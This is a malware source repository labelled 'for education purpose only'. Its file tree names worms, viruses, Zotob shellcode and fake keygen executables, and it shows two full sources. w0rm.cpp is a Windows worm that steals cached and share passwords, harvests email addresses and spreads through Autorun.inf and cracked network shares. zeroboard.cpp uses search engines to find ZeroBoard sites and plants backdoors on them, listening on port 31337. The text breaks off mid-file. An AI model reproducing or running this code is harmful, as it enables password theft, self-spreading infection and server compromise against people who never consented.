├── README.md ├── Worm └── w0rm.cpp ├── ZeroBoard └── zeroboard.cpp ├── velasco ├── Marcos Velasco Security.url ├── marcos │ ├── group │ │ ├── bld.inf │ │ ├── marcos.mmp │ │ └── marcos.pkg │ ├── inc │ │ └── marcos.h │ └── src │ │ └── marcos.cpp ├── readme.txt └── velasco │ ├── group │ ├── ABLD.BAT │ ├── bld.inf │ ├── velasco.mmp │ ├── velasco.pkg │ └── velasco.rss │ ├── inc │ ├── bluetooth.h │ ├── file.h │ ├── header.h │ ├── resource.h │ ├── velascoapplication.h │ ├── velascoappui.h │ ├── velascocopyfiles.h │ └── velascodocument.h │ └── src │ ├── bluetooth.cpp │ ├── file.cpp │ ├── velasco.cpp │ ├── velascoapplication.cpp │ ├── velascoappui.cpp │ ├── velascocopyfiles.cpp │ └── velascodocument.cpp ├── virus miei ├── distraction │ ├── windows_vista_xp_2000_nt_me_98_serial_generator.au3 │ └── windows_vista_xp_2000_nt_me_98_serial_generator.exe ├── kaboom │ └── Kaboom.cpp └── mystic │ ├── windows vista key generation.au3 │ └── windows vista key generation.exe ├── wrathrage ├── Debug │ ├── BuildLog.htm │ ├── OMBUDSMN.ASP │ ├── Project.ilk │ ├── Project.pdb │ ├── b64.obj │ ├── b64decode.obj │ ├── project.obj │ ├── vc70.idb │ └── vc70.pdb ├── Project.ncb ├── Project.sln ├── Project.suo ├── Project.vcproj ├── UpgradeLog.XML ├── _UpgradeReport_Files │ ├── Thumbs.db │ ├── UpgradeReport.css │ ├── UpgradeReport.xslt │ ├── UpgradeReport_Minus.gif │ └── UpgradeReport_Plus.gif ├── b64.cpp ├── b64decode.cpp ├── msgrua.h ├── msgruaid.h ├── project.cpp └── project.h ├── yahasux └── yahasux.c ├── yourdoom ├── Icon_1.ico ├── icon.ico ├── main.cpp ├── program.dev ├── readme.txt ├── text.ico └── vssver2.scc └── zotob └── Zotob Code └── RELEASE ├── Cback.asm ├── PnP.asm ├── make.bat ├── shellcode.asm └── zotob.zip /README.md: -------------------------------------------------------------------------------- 1 | ######################### 2 | For education purpose only 3 | Virus source code 4 | ########################## 5 | malware code 6 | -------------------------------------------------------------------------------- /Worm/w0rm.cpp: -------------------------------------------------------------------------------- 1 | // ---[ w0rm.cpp ]-----------------------------[ http://harmony.haxors.com ]--// 2 | // 3 | // An exploration into remote network propogation using multiple techniques. 4 | // The w0rm will spread via e-mail (MAPI) all local drives and any writable 5 | // network shares. It collects passwords on the local system to be used in 6 | // cracking any password protected shares on the network. It will write an 7 | // Autorun.inf file in the root of any drives it can so when you open that 8 | // drive, e.g. double click it the w0rm will execute and go resident :). 9 | // This code is obviously buggy and not intended to be actually used in the 10 | // 'real' world. To determine if the payload should be deployed the w0rm 11 | // sits on the network and plays a 'game' with other w0rms on that network 12 | // segment via broadcast UDP messages. see relevant source for a proper 13 | // idea of the 'game', its just a perverse example of too much time on ones 14 | // hands :). this is version 1.00 so the are bugs, incompatabilities with 15 | // various flavors of windows and other anomolies - dose! but if you want 16 | // something better write it yourself ;) (and send me a copy) 17 | // 18 | // "this is the end, beautiful friend" - the doors 19 | // 20 | // ---[ harmony :: temple of the screaming interrupt ]--[ nomelody@gmx.net ]--// 21 | 22 | //--header-files--------------------------------------------------------------// 23 | #include 24 | #include 25 | #include 26 | #include 27 | #include 28 | 29 | #include 30 | //--defines-------------------------------------------------------------------// 31 | #define MAX_LENGTH 128 32 | #define MAX_RECIEVERS 50 33 | #define MUTEX_NAME "w0rm" 34 | #define EARTH_WORM_JIM "Readme.exe" 35 | 36 | #define WORMGAME_PORT 12345 37 | #define WORMGAME_MAX_WINS 10 38 | #define WORMGAME_PKT_PLAY 0xFF 39 | #define WORMGAME_PKT_WIN 0x80 40 | //--globals-------------------------------------------------------------------// 41 | char *ptrEgo, *buf; 42 | char addressList[MAX_RECIEVERS][MAX_LENGTH], passwordList[50][MAX_LENGTH]; 43 | int index = 0; 44 | 45 | typedef struct tagPASSWORD_CACHE_ENTRY { 46 | WORD cbEntry; 47 | WORD cbResource; 48 | WORD cbPassword; 49 | BYTE iEntry; 50 | BYTE nType; 51 | BYTE abResource[1]; 52 | } PASSWORD_CACHE_ENTRY; 53 | 54 | typedef struct WormGamePkt { 55 | BYTE pktType; 56 | int pktNum; 57 | } AWORMGAMEPACKET; 58 | //--function-declarations-----------------------------------------------------// 59 | DWORD WINAPI WormGameThread( LPVOID ); 60 | DWORD WINAPI WormMainThread( LPVOID ); 61 | 62 | BOOL runningNT(); 63 | void propogateMAPI( void ); 64 | int initMAPI( void ); 65 | int validAddress( char * addr ); 66 | int sendMessage( int recipNum, LHANDLE lhSession ); 67 | int getSharePasswords( void ); 68 | int getCachedPasswords( void ); 69 | int addPassword( char * pwd ); 70 | void propogateDrive( void ); 71 | void attackDrive( char * drive, int type ); 72 | void propogateNet( LPNETRESOURCE lpnr ); 73 | int crackNetShare( char * share ); 74 | void releasePayload(); 75 | 76 | extern "C" int __stdcall RegisterServiceProcess( int dwProcessID, int dwType ); 77 | //--entry-point---------------------------------------------------------------// 78 | // WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR, int) 79 | int main( int argc, char **argv ) 80 | { 81 | HANDLE hMutex, hEgo, hWormGameThread, hWormMainThread; 82 | DWORD WormGameThreadId, WormMainThreadId; 83 | 84 | // display explorer window if we need to, due to autorun.inf file :) 85 | // test for any command line... 86 | 87 | /* only allow one instance of worm to run on system at one time */ 88 | hMutex = CreateMutex( NULL, TRUE, MUTEX_NAME); 89 | if( GetLastError() == ERROR_ALREADY_EXISTS ) 90 | { 91 | ExitProcess( 0 ); 92 | } 93 | 94 | ptrEgo = argv[0]; 95 | 96 | /* try to 'hide' the process */ 97 | if( runningNT() == TRUE ) 98 | { 99 | // hide process in winNT 100 | printf("WORM running on WinNT\n"); 101 | } else { 102 | printf("WORM running on Win9x\n"); 103 | LoadLibrary( "KERNAL32.DLL" ); 104 | RegisterServiceProcess( NULL, 1); 105 | } 106 | 107 | /* go resident and give worm RAW power */ 108 | hEgo = GetCurrentProcess(); 109 | SetPriorityClass( hEgo, HIGH_PRIORITY_CLASS); 110 | 111 | // create suspended WormMainThread... 112 | hWormMainThread = CreateThread( NULL, 0, WormMainThread, 0, CREATE_SUSPENDED, &WormMainThreadId); 113 | if( hWormMainThread != NULL ) 114 | { 115 | // set thread to time critical... 'i wana take you higher' - sly and the family stone 116 | //SetThreadPriority( hWormMainThread, THREAD_PRIORITY_TIME_CRITICAL); 117 | // resume thread execution... 118 | ResumeThread( hWormMainThread ); 119 | } 120 | /* 121 | // create suspended WormGameThread... 122 | hWormGameThread = CreateThread( NULL, 0, WormGameThread, 0, CREATE_SUSPENDED, &WormGameThreadId); 123 | if( hWormGameThread != NULL ) 124 | { 125 | // resume thread execution... 126 | ResumeThread( hWormGameThread ); 127 | } 128 | */ 129 | /* wait for hWormGameThread() to terminate */ 130 | // WaitForSingleObject( hWormGameThread, INFINITE); 131 | WaitForSingleObject( hWormMainThread, INFINITE); 132 | 133 | printf("MAIN_DEBUG: worm threads ended, im outa here: press a key...\n"); 134 | getch(); 135 | 136 | /* release our mutex, next local worm wont get blocked */ 137 | if( hMutex != NULL ) 138 | { 139 | ReleaseMutex( hMutex ); 140 | } 141 | return 0; 142 | } 143 | 144 | //----------------------------------------------------------------------------// 145 | DWORD WINAPI WormMainThread( LPVOID ) 146 | { 147 | DWORD dwSize; 148 | char buff[64]; 149 | printf("WormMainThread: started...\n"); 150 | /* spread worm via MAPI */ 151 | propogateMAPI(); 152 | /* get any passwords we can for use later on */ 153 | getSharePasswords(); 154 | getCachedPasswords(); 155 | dwSize = 64; 156 | WNetGetUser( NULL, buff, &dwSize ); 157 | addPassword( buff ); 158 | printf("DEBUG: total pwds got = %d\n", index); 159 | /* spread worm via any/all localy maped drives */ 160 | propogateDrive(); 161 | /* spread worm via any/all LAN network shares */ 162 | propogateNet( NULL ); 163 | /* finished our little game :) */ 164 | ExitThread( 0 ); 165 | return 0; 166 | } 167 | //----------------------------------------------------------------------------// 168 | DWORD WINAPI WormGameThread( LPVOID ) 169 | { 170 | 171 | WSADATA w; 172 | SOCKET s_recv, s_send; 173 | sockaddr_in saddr, saddr_in, saddr_out; 174 | int size = sizeof( struct sockaddr ), totalwins = 0, magicWorm = 0, optval; 175 | AWORMGAMEPACKET gamePkt; 176 | fd_set fd_read; 177 | struct timeval timeout = { 5, 0 }; 178 | 179 | if( WSAStartup( MAKEWORD(1,0), &w) != 0 ) 180 | { 181 | printf("WormThread: WSAStartup failed\n"); 182 | goto endThread; 183 | } 184 | 185 | s_recv = socket( AF_INET, SOCK_DGRAM, IPPROTO_UDP); 186 | s_send = socket( AF_INET, SOCK_DGRAM, IPPROTO_UDP); 187 | if( s_recv == INVALID_SOCKET || s_send == INVALID_SOCKET ) 188 | { 189 | printf("WormThread: invalid socket\n"); 190 | goto endThread; 191 | } 192 | 193 | memset( &saddr_in, 0x00, sizeof( struct sockaddr)); 194 | 195 | memset( &saddr, 0x00, sizeof( struct sockaddr)); 196 | saddr.sin_family = AF_INET; 197 | saddr.sin_port = htons( WORMGAME_PORT ); 198 | saddr.sin_addr.s_addr = INADDR_ANY; 199 | 200 | memset( &saddr_out, 0x00, sizeof( struct sockaddr) ); 201 | saddr_out.sin_family = AF_INET; 202 | saddr_out.sin_port = htons( WORMGAME_PORT ); 203 | saddr_out.sin_addr.s_addr = INADDR_BROADCAST; 204 | 205 | optval = 1; 206 | if( setsockopt( s_send, SOL_SOCKET, SO_BROADCAST , (char*)&optval, sizeof( int) ) == SOCKET_ERROR ) 207 | { 208 | printf("WormThread: setsocketopt failed\n"); 209 | goto endThread; 210 | } 211 | 212 | if( bind( s_recv, (struct sockaddr*)&saddr, sizeof( struct sockaddr)) == SOCKET_ERROR ) 213 | { 214 | printf("WormThread: bind failed\n"); 215 | goto endThread; 216 | } 217 | 218 | FD_ZERO( &fd_read ); 219 | FD_SET( s_recv, &fd_read ); 220 | randomize(); 221 | loop: 222 | while( 1 ) 223 | { 224 | if( totalwins >= WORMGAME_MAX_WINS ) 225 | { 226 | releasePayload(); 227 | totalwins = 0; 228 | } 229 | // pick a magic number... 230 | magicWorm = ( ( rand() % 100 ) + 1 ); 231 | printf("WormThread: picked a magic num: %d\n", magicWorm); 232 | // wait a length of time... 233 | Sleep( 500 ); 234 | // send my magic number... 235 | gamePkt.pktType = WORMGAME_PKT_PLAY; 236 | gamePkt.pktNum = magicWorm; 237 | if( sendto( s_send, (const char*)&gamePkt, sizeof( struct WormGamePkt ), 0, (struct sockaddr*)&saddr_out, size) == SOCKET_ERROR ) 238 | { 239 | printf("WormThread: sendto failed\n"); 240 | break; 241 | } 242 | 243 | // handel responces... 244 | while( select( 0, &fd_read, NULL, NULL, &timeout) != SOCKET_ERROR ) 245 | { 246 | if( recvfrom( s_recv, (char*)&gamePkt, sizeof( struct WormGamePkt ), 0, (struct sockaddr*)&saddr_in, &size) == SOCKET_ERROR ) 247 | { 248 | printf("WormThread: recvfrom failed\n"); 249 | break; 250 | } else { 251 | switch( gamePkt.pktType ) 252 | { 253 | case WORMGAME_PKT_PLAY: // recieved a magic number... 254 | // ignore responce from local machine... 255 | printf("WormThread: recieved a magic num: %d\n", gamePkt.pktNum); 256 | // process other responces 257 | if( gamePkt.pktNum == magicWorm ) 258 | { 259 | // notify any winners 260 | gamePkt.pktType = WORMGAME_PKT_WIN; 261 | saddr_out.sin_addr.s_addr = saddr_in.sin_addr.s_addr; 262 | sendto( s_send, (const char*)&gamePkt, sizeof( struct WormGamePkt ), 0, (struct sockaddr*)&saddr_out, size); 263 | saddr_out.sin_addr.s_addr = INADDR_BROADCAST; 264 | } 265 | break; 266 | case WORMGAME_PKT_WIN: // im a winner :) 267 | printf("WormThread: IM A WINNER!!!\n"); 268 | totalwins++; 269 | goto loop; 270 | default: // its all gone bugfuck! 271 | printf("WormThread: its all gone bugfuck!\n"); 272 | break; 273 | } 274 | } 275 | } // while(select... 276 | } 277 | endThread: 278 | closesocket( s_recv ); 279 | closesocket( s_send ); 280 | ExitThread( 0 ); 281 | return 0; 282 | } 283 | //----------------------------------------------------------------------------// 284 | BOOL runningNT() 285 | { 286 | OSVERSIONINFO osvi; 287 | BOOL retval = FALSE; 288 | 289 | osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO); 290 | GetVersionEx(&osvi); 291 | switch( osvi.dwPlatformId ) 292 | { 293 | case VER_PLATFORM_WIN32_NT: 294 | retval = TRUE; 295 | break; 296 | case VER_PLATFORM_WIN32_WINDOWS: 297 | retval = FALSE; 298 | break; 299 | default: // VER_PLATFORM_LINUX ? :) || VER_PLATFORM_WIN32_ANOTHERBUGGYRELEASE 300 | retval = FALSE; 301 | break; 302 | } 303 | return retval; 304 | } 305 | //----------------------------------------------------------------------------// 306 | void propogateMAPI( void ) 307 | { 308 | LHANDLE lhSession; 309 | CHAR rgchMsgID[513]; 310 | MapiMessage *lpMessage; 311 | int i=0; 312 | if( initMAPI() != 0 ) 313 | { 314 | return; 315 | } 316 | if( MAPILogon( 0, NULL, NULL, 0, 0, &lhSession) == SUCCESS_SUCCESS) 317 | { 318 | *rgchMsgID = NULL; 319 | while( i < MAX_RECIEVERS ) 320 | { 321 | if( MAPIFindNext( lhSession, 0L, NULL, rgchMsgID, MAPI_LONG_MSGID, 0L, rgchMsgID) != SUCCESS_SUCCESS) 322 | { 323 | break; 324 | } 325 | if( MAPIReadMail( lhSession, 0L, rgchMsgID, MAPI_PEEK, 0L, &lpMessage) == SUCCESS_SUCCESS) 326 | { 327 | // printf("DOING: %s\n\t%s\n",lpMessage->lpOriginator->lpszAddress,lpMessage->lpRecips->lpszAddress); 328 | if( validAddress( lpMessage->lpOriginator->lpszAddress ) == 0 ) 329 | { 330 | strcpy( addressList[i], lpMessage->lpOriginator->lpszAddress); 331 | i++; 332 | } 333 | if( validAddress( lpMessage->lpRecips->lpszAddress ) == 0 ) 334 | { 335 | strcpy( addressList[i], lpMessage->lpRecips->lpszAddress); 336 | i++; 337 | } 338 | } 339 | 340 | } 341 | MAPIFreeBuffer( lpMessage ); 342 | 343 | // TO DO: sort addressList and remove duplicates... 344 | 345 | //sendMessage( i, lhSession ); // <---- !!!!!! 346 | 347 | MAPILogoff( lhSession, 0L, 0L, 0L); 348 | } 349 | for( int x = 0 ; x < i ; x++ ) 350 | { 351 | printf("DEBUG: attacking:\t%s\n", addressList[x]); 352 | } 353 | return; 354 | } 355 | //----------------------------------------------------------------------------// 356 | int initMAPI( void ) 357 | { 358 | HINSTANCE hi; 359 | LPMAPILOGON MAPILogon; 360 | LPMAPIFINDNEXT MAPIFindNext; 361 | LPMAPIREADMAIL MAPIReadMail; 362 | LPMAPISENDMAIL MAPISendMail; 363 | hi = LoadLibrary( "mapi32.dll" ); 364 | if( hi == NULL ) 365 | { 366 | return -1; 367 | } 368 | MAPILogon = (LPMAPILOGON)GetProcAddress( hi, "MAPILogon"); 369 | MAPIFindNext = (LPMAPIFINDNEXT)GetProcAddress( hi, "MAPIFindNext"); 370 | MAPIReadMail = (LPMAPIREADMAIL)GetProcAddress( hi, "MAPIReadMail"); 371 | MAPISendMail = (LPMAPISENDMAIL)GetProcAddress( hi, "MAPISendMail"); 372 | if( MAPILogon == NULL || MAPIFindNext == NULL || MAPIReadMail == NULL || MAPISendMail == NULL ) 373 | { 374 | return -1; 375 | } 376 | return 0; 377 | } 378 | //----------------------------------------------------------------------------// 379 | int validAddress( char * addr ) 380 | { 381 | if( strlen( addr ) >= MAX_LENGTH || strlen( addr ) == 0) 382 | { 383 | return -1; 384 | } else if( strchr( addr , '@') == NULL ) 385 | { 386 | return -1; 387 | } else if( strchr( addr , '.') == NULL ) 388 | { 389 | return -1; 390 | } else { 391 | return 0; 392 | } 393 | } 394 | //----------------------------------------------------------------------------// 395 | int sendMessage( int recipNum, LHANDLE lhSession ) 396 | { 397 | MapiRecipDesc *recips = (MapiRecipDesc *)malloc( recipNum*sizeof(MapiRecipDesc) ); 398 | MapiFileDesc attachment = { 0, 0, (ULONG)-1, ptrEgo, EARTH_WORM_JIM, NULL}; 399 | for( int i=0 ; iabResource+x->cbResource, x->cbPassword); 420 | buf[x->cbPassword] = 0; 421 | addPassword( buf ); 422 | return 0; 423 | } 424 | //----------------------------------------------------------------------------// 425 | int getCachedPasswords( void ) 426 | { 427 | buf = new char[1024]; 428 | HINSTANCE hi = LoadLibrary("mpr.dll"); 429 | if( hi == NULL ) 430 | { 431 | return -1; 432 | } 433 | WORD (__stdcall *enp)(LPSTR, WORD, BYTE, void*, DWORD) = (WORD (__stdcall *)(LPSTR, WORD, BYTE, void*, DWORD))GetProcAddress(hi, "WNetEnumCachedPasswords"); 434 | if( enp == NULL ) 435 | { 436 | return -1; 437 | } 438 | enp( 0, 0, 0xff, pce, 0); 439 | FreeLibrary( hi ); 440 | return 0; 441 | } 442 | //----------------------------------------------------------------------------// 443 | BYTE rotr( BYTE b ) 444 | { 445 | BYTE carry; 446 | carry = b & 0x01; 447 | carry <<= 7; 448 | b >>= 1; 449 | b |= carry; 450 | return b; 451 | } 452 | //----------------------------------------------------------------------------// 453 | void decodePW( char * pw ) 454 | { 455 | BYTE hash = 0x35; 456 | while( pw && *pw ) 457 | { 458 | *pw = *pw ^ hash; 459 | pw++; 460 | hash = rotr( hash ); 461 | } 462 | } 463 | //----------------------------------------------------------------------------// 464 | int addPassword( char * pwd ) 465 | { 466 | if( (strlen(pwd) > 0) && (strlen(pwd) < MAX_LENGTH) ) 467 | { 468 | strcpy( passwordList[ index ], pwd); 469 | printf("DEBUG: ADDED: %s\n", passwordList[ index ]); 470 | index++; 471 | } 472 | return 0; 473 | } 474 | //----------------------------------------------------------------------------// 475 | int getSharePasswords( void ){ 476 | if( runningNT() == FALSE ) 477 | { 478 | HKEY key, subkey; 479 | DWORD i, maxKeys, len, junk; 480 | char keyName[256], wrightPwd[256], readPwd[256]; 481 | RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan", 0, NULL, &key); 482 | RegQueryInfoKey (key, NULL, NULL, NULL, &maxKeys, NULL, NULL,NULL, NULL, NULL, NULL, NULL); 483 | if( maxKeys != 0 ) 484 | { 485 | for( i=0; i 0 && length < MAX_LENGTH) 519 | { 520 | for( int i=0 ; i<=(length/4) ; i++ ) 521 | { 522 | switch( GetDriveType( ptr ) ) 523 | { 524 | case DRIVE_FIXED: 525 | // The drive is a local drive. 526 | printf("DRIVE_FIXED: %s\n", ptr); 527 | attackDrive( ptr, 1 ); 528 | break; 529 | case DRIVE_REMOTE: 530 | // The drive is a network drive. 531 | printf("DRIVE_REMOTE: %s\n", ptr); 532 | attackDrive( ptr, 1 ); 533 | break; 534 | default: 535 | break; 536 | } 537 | *ptr+=1; 538 | } 539 | } 540 | return; 541 | } 542 | //----------------------------------------------------------------------------// 543 | void attackDrive( char * drive, int type ) 544 | { 545 | FILE *fpAutorun; 546 | char buff[MAX_LENGTH]; 547 | // copy worm to drive, Attribute = hidden 548 | if( type == 1 ) 549 | { 550 | sprintf( buff, "%s%s", drive, EARTH_WORM_JIM); 551 | } else { 552 | sprintf( buff, "%s\\%s", drive, EARTH_WORM_JIM); 553 | } 554 | printf("DEBUG: propogateDrive: attacking %s\nATTACK REMOTE: %s\n", drive, buff); 555 | /* if( CopyFile( ptrEgo, buff, FALSE) == TRUE && type == 1 ) 556 | { 557 | // create an Autorun.inf file on drive, Attribute = hidden 558 | sprintf( buff, "%sAutorun.inf", drive); 559 | fpAutorun = fopen(buff, "w"); 560 | if( fpAutorun != NULL ) 561 | { 562 | fprintf( fpAutorun, "[Autorun]\nOPEN=%s\n", EARTH_WORM_JIM); 563 | fclose( fpAutorun ); 564 | _rtl_chmod(buff, 1, FA_HIDDEN | FA_RDONLY); 565 | } 566 | } */ 567 | return; 568 | } 569 | //----------------------------------------------------------------------------// 570 | void propogateNet( LPNETRESOURCE lpnr ) 571 | { 572 | DWORD dwResult, dwResultEnum, cbBuffer = 16384, cEntries = 0xFFFFFFFF; 573 | HANDLE hEnum; 574 | LPNETRESOURCE lpnrLocal; 575 | dwResult = WNetOpenEnum( RESOURCE_GLOBALNET, RESOURCETYPE_ANY, 0, lpnr, &hEnum); 576 | if( dwResult != NO_ERROR ) 577 | { 578 | return; 579 | } 580 | do 581 | { 582 | lpnrLocal = (LPNETRESOURCE) GlobalAlloc(GPTR, cbBuffer); 583 | dwResultEnum = WNetEnumResource(hEnum, &cEntries, lpnrLocal, &cbBuffer); 584 | if ( dwResultEnum == NO_ERROR ) 585 | { 586 | for( DWORD i = 0; i < cEntries; i++ ) 587 | { 588 | if( RESOURCEUSAGE_CONTAINER == ( lpnrLocal[i].dwUsage & RESOURCEUSAGE_CONTAINER ) ) 589 | { 590 | propogateNet( &lpnrLocal[i] ); 591 | } else if( RESOURCETYPE_DISK == ( lpnrLocal[i].dwUsage & RESOURCETYPE_DISK ) ) 592 | { 593 | if( WNetAddConnection( lpnrLocal[ i ].lpRemoteName, NULL, NULL) == ERROR_INVALID_PASSWORD ) 594 | { 595 | // try all found password/username combinations... 596 | printf("ERROR_INVALID_PASSWORD "); printf("ATTACKING: %s\n",lpnrLocal[ i ].lpRemoteName ); 597 | if( crackNetShare( lpnrLocal[ i ].lpRemoteName ) == 0 ) 598 | { 599 | attackDrive( lpnrLocal[i].lpRemoteName, 0 ); 600 | WNetCancelConnection( lpnrLocal[i].lpRemoteName, FALSE); 601 | } 602 | } else { 603 | attackDrive( lpnrLocal[i].lpRemoteName, 0 ); 604 | WNetCancelConnection( lpnrLocal[i].lpRemoteName, FALSE); 605 | printf("ACCESS NOT DENIED "); printf("ATTACKING: %s\n",lpnrLocal[ i ].lpRemoteName ); 606 | } 607 | } 608 | } 609 | } else if( dwResultEnum != ERROR_NO_MORE_ITEMS ) { 610 | break; 611 | } 612 | } while( dwResultEnum != ERROR_NO_MORE_ITEMS ); 613 | GlobalFree( (HGLOBAL) lpnrLocal ); 614 | WNetCloseEnum( hEnum ); 615 | return; 616 | } 617 | //----------------------------------------------------------------------------// 618 | int crackNetShare( char * share ) 619 | { 620 | int retval = 0; 621 | for( int i=0 ; i 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #ifdef __sun__ 21 | #include 22 | #endif /* __SunOS__ */ 23 | 24 | #define DEBUG_ING 25 | #undef DEBUG_ING 26 | 27 | #define TMP_FILE "./tmp.core" 28 | #define CMD_FILE "./cmd.core" 29 | #define PRC_FILE "./proc.core" 30 | #define SCS (0) 31 | #define MIN (1) 32 | 33 | #ifdef __linux__ 34 | #define DEF_ETH "eth0" 35 | #else 36 | #ifdef __FreeBSD__ 37 | #define DEF_ETH "ed0" 38 | #else 39 | #ifdef __sun__ 40 | #define DEF_ETH "hme0" 41 | #endif 42 | #endif 43 | #endif 44 | 45 | #define MAX_BUF (0x0000ffff) 46 | #define FIR_BUF (0x00000800) 47 | #define SEC_BUF (0x00000400) 48 | #define THR_BUF (0x00000200) 49 | #define MIN_BUF (0x00000100) 50 | 51 | #define VENDOR "nzeo.com" 52 | 53 | // search rule 54 | #define FD_RULE_0 "/zboard/zboard.php" 55 | #define FD_RULE_1 "/zb41/zboard.php" 56 | #define FD_RULE_2 "/bbs/zboard.php" 57 | #define FD_RULE_3 "/zb/zboard.php" 58 | #define FD_RULE_4 "/zb40/zboard.php" 59 | #define FD_RULE_5 "/board/zboard.php" 60 | #define FD_RULE_6 "zboard.php" 61 | #define FD_RULE_7 "zboard.ph" 62 | 63 | // pattern 64 | #define FD_PATH_0 "/zboard/skin/zero_vote/login.php" 65 | #define FD_PATH_1 "/zb41/skin/zero_vote/login.php" 66 | #define FD_PATH_2 "/bbs/skin/zero_vote/login.php" 67 | #define FD_PATH_3 "/zb/skin/zero_vote/login.php" 68 | #define FD_PATH_4 "/zb40/skin/zero_vote/login.php" 69 | #define FD_PATH_5 "/board/skin/zero_vote/login.php" 70 | #define FD_PATH_6 "/skin/zero_vote/login.php" 71 | 72 | #define RESULT_OK "200 OK" 73 | #define MAKE_STR1 "BACKDOOR MAKE SUCCESS" 74 | #define MAKE_STR2 "ZBCODE MAKE SUCCESS" 75 | #define DELT_STR1 "BACKDOOR DELETE SUCCESS" 76 | #define DELT_STR2 "ZBCODE DELETE SUCCESS" 77 | 78 | #define DEF_PORT (31337) 79 | #define CONN_PORT (80) 80 | #define DEF_TIME (20) 81 | 82 | int set_sock(char *sc_gt_host,int port,int type); 83 | void re_connt_lm(int st_sock_va,int type); 84 | int proc_r(); 85 | void t_kill(); 86 | void sf_exit(); 87 | int g_ip(char *ip); 88 | int make_cmd_file(); 89 | int filter_f(char *test_bf,int tnum); 90 | 91 | int sock; 92 | 93 | struct tg_rl 94 | { 95 | int r_num; 96 | char *r_str; 97 | char *url_str; 98 | }; 99 | 100 | #define TARGET_NUM (7) 101 | #define SEARCH_NUM (4) 102 | 103 | struct tg_rl __tg_rule_va[]= 104 | { 105 | {0,FD_RULE_0,FD_PATH_0}, 106 | {1,FD_RULE_1,FD_PATH_1}, 107 | {2,FD_RULE_2,FD_PATH_2}, 108 | {3,FD_RULE_3,FD_PATH_3}, 109 | {4,FD_RULE_4,FD_PATH_4}, 110 | {5,FD_RULE_5,FD_PATH_5}, 111 | {6,FD_RULE_6,FD_PATH_6}, 112 | {7,FD_RULE_7,FD_PATH_6}, 113 | {8,NULL,NULL} 114 | }; 115 | 116 | struct search_rule 117 | { 118 | int num; 119 | u_char *url; 120 | int maxnum; 121 | int defnum; 122 | u_char *http_head; 123 | }; 124 | 125 | struct search_rule search_va[]= 126 | { 127 | {0,"www.google.com",990,10,"http://"}, 128 | {1,"kr.search.yahoo.com",990,15,"http://"}, 129 | {2,"search.nate.com",480,10,"http://"}, 130 | {3,"search.lycos.com",990,10,"//"}, 131 | {4,"kr.altavista.com",1000,10,"//"}, 132 | {5,NULL,0,0,NULL} 133 | }; 134 | 135 | void t_kill() 136 | { 137 | #ifdef DEBUG_ING 138 | fprintf(stdout,"time out\n"); 139 | #endif 140 | close(sock); 141 | sock=-1; 142 | signal(SIGALRM,SIG_DFL); 143 | return; 144 | } 145 | 146 | void sf_exit() 147 | { 148 | #ifdef DEBUG_ING 149 | fprintf(stdout,"safe exit\n"); 150 | #endif 151 | close(sock); 152 | kill((int)proc_r(),9); 153 | unlink(TMP_FILE); 154 | unlink(CMD_FILE); 155 | unlink(PRC_FILE); 156 | exit(-1); 157 | } 158 | 159 | int main(int argc,char *argv[]) 160 | { 161 | FILE *fp; 162 | 163 | int tnum=(SCS); 164 | int chk=(SCS); 165 | int gogo=(SCS); 166 | int whgl=(SCS); 167 | int qnum=(SCS); 168 | int tgrl_sl=(MIN); 169 | int _conn_num=(SCS); 170 | int port=(CONN_PORT); 171 | int def_port=(DEF_PORT); 172 | int sc_gt_sock; 173 | int host_chk=(SCS); 174 | 175 | u_char *gg_ptr=NULL; 176 | u_char *t_ptr=NULL; 177 | u_char __zr_bf[(MAX_BUF)]; 178 | u_char *port_ptr=NULL; 179 | 180 | char pkt[(FIR_BUF)]; 181 | char host[(SEC_BUF)]; 182 | char url[(SEC_BUF)]; 183 | char test_bf[(MAX_BUF)]; 184 | char req_t_bf[(THR_BUF)]; 185 | char ip[(MIN_BUF)]; 186 | char atk_code[(MIN_BUF)]; 187 | 188 | signal(SIGINT,sf_exit); 189 | signal(SIGTSTP,sf_exit); 190 | 191 | while((whgl=getopt(argc,argv,"S:s:T:t:Q:q:P:p:H:h:U:u:"))!=EOF) 192 | { 193 | extern char *optarg; 194 | switch(whgl) 195 | { 196 | case 'S': 197 | case 's': 198 | tnum=atoi(optarg); 199 | if(SEARCH_NUM') 376 | chk=0; 377 | } 378 | else { 379 | if(t_ptr[gogo]==' ') 380 | continue; 381 | else if(t_ptr[gogo]=='<') 382 | chk=1; 383 | else test_bf[whgl++]=t_ptr[gogo]; 384 | } 385 | } 386 | 387 | if(!strstr(test_bf,__tg_rule_va[tgrl_sl].r_str)) 388 | continue; 389 | else t_ptr=(char *)strstr(test_bf,__tg_rule_va[tgrl_sl].r_str); 390 | 391 | if(t_ptr!=NULL) 392 | t_ptr[0]='\0'; 393 | else continue; 394 | 395 | if(filter_f(test_bf,tnum)) 396 | { 397 | t_ptr=(char *)strstr(test_bf,search_va[tnum].http_head) + strlen(search_va[tnum].http_head); 398 | if(strstr(t_ptr,search_va[tnum].http_head)) 399 | continue; 400 | 401 | memset((char *)host,0,sizeof(host)); 402 | memset((char *)url,0,sizeof(url)); 403 | 404 | chk=(SCS); 405 | 406 | if(strstr(test_bf,search_va[tnum].http_head)) 407 | { 408 | t_ptr=(char *)strstr(test_bf,search_va[tnum].http_head) + strlen(search_va[tnum].http_head); 409 | port=(CONN_PORT); 410 | 411 | for(whgl=0;whglh_addr); 516 | memset(&(sock_st.sin_zero),0,8); 517 | 518 | if(connect(sock,(struct sockaddr *)&sock_st,sizeof(struct sockaddr))==-1) 519 | { 520 | close(sock); 521 | return(-1); 522 | } 523 | return(sock); 524 | } 525 | else{ 526 | if((sc_gt_sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1) 527 | { 528 | return(-1); 529 | } 530 | 531 | sock_st.sin_family=(AF_INET); 532 | sock_st.sin_port=htons(port); 533 | sock_st.sin_addr.s_addr=(INADDR_ANY); 534 | memset(&(sock_st.sin_zero),0,8); 535 | 536 | if(bind(sc_gt_sock,(struct sockaddr *)&sock_st,sizeof(struct sockaddr))==-1) 537 | { 538 | close(sc_gt_sock); 539 | return(-1); 540 | } 541 | #define BK_LG 10 542 | if(listen(sc_gt_sock,(BK_LG))==-1){ 543 | close(sc_gt_sock); 544 | return(-1); 545 | } 